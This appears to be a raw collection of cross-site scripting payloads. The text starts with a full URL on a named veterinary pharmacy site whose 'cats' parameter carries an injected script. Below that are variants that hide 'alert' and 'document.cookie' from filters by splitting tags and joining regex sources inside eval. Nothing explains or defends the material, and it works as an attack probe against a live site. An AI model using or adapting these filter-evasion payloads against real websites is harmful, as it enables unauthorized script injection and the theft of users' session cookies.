https://spsah2.securevetsource.com/site/view/53798_OnlinePharmacy.pml?cats=%27%3C%3Ck%3E/script%3E%27%3C%3Ck%3Escript%3Eeval(/aler/.source%2b/t(document.cookie)/.source)%3C%3Ck%3E/script%3E&hierarchy=&sort=score%20desc&pre=true



alert(document.cookie)

eval(/aler/.source%2b/t(document.cookie/.source)




eval(/ale/.source%2b/rt(/.source)+eval(/docum/.source%2b/ent.cookie)/.source)



<<k>/script>'<<k>script>eval(/ale/.source%2b/rt(1).source)


<<k>script>eval(/ale/.source%2b/rt("ALERTPOMP")/.source)


eval(/ale/.source%2b/rt(/.source%2b/docu/.source%2b/ment.domain)/.source)
